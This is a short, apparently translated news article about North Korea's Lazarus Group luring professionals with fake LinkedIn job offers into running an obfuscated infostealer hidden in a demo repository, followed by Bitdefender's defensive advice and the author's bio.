The hacker group known as Lazarus Group has launched a sophisticated attack campaign aimed at organizations through LinkedIn. This group, linked to North Korea, uses false job offers to attract professionals from various industries, with the aim of stealing confidential information and distributing malware.

The attack begins with an attractive message on LinkedIn, offering an opportunity for collaboration in a project related to the exchange of decentralized cryptocurrencies. Remote work promises, flexibility and good remuneration capture the attention of professionals. Once the victim shows interest, the attackers request their curriculum or the link to their personal github repository. These files are used to legitimize the conversation and obtain more personal information from the victim.

After receiving the requested information, the attackers share a repository that supposedly contains the minimum viable product (MVP) of the project and a feedback form that must be completed after executing the demonstration. At first glance, the code seems harmless, but a more detailed inspection reveals a highly obfuscated script that dynamically charges malicious code from an external connection point. This malware, identified as a multiplatform infostealer, is designed to steal information from cryptocurrency wallets and login credentials in browsers.

The objective of these attacks goes beyond the theft of personal data. By compromising people who work in critical sectors such as aviation, defense and nuclear industry, attackers seek to exfere classified information, corporate proprietary technologies and credentials. Executing malware on business devices could give attackers access to sensitive data, amplifying potential damage.

Recommendations and security measures

Bitdefender recommends that developers and IT professionals that are on guard against these tactics. It is crucial not to download or execute files from unknown sources out of safe environments such as sandboxes, where the code can be analyzed without a risk of infection. In addition, companies are advised to implement robust security measures and educate their employees about the risks of false job offers on professional platforms.

The company emphasizes the importance of collaboration between security equipment and employees to detect and mitigate these attacks. Alina Bizga, security analyst at Bitdefender, said the company has used safe test environments to analyze malware and better understand the tactics of the attackers.

Alex Chen
Alex Chen

Alex Chen serves as the chief editor of Asia Tech Journal, bringing over a decade of experience in technology journalism. Previously writing for several globally renowned publications, Alex is celebrated for his insightful analyses and in-depth reporting on tech trends across Asia. Passionate about innovation, Alex specializes in the dynamic technology ecosystem of China and its global impacts.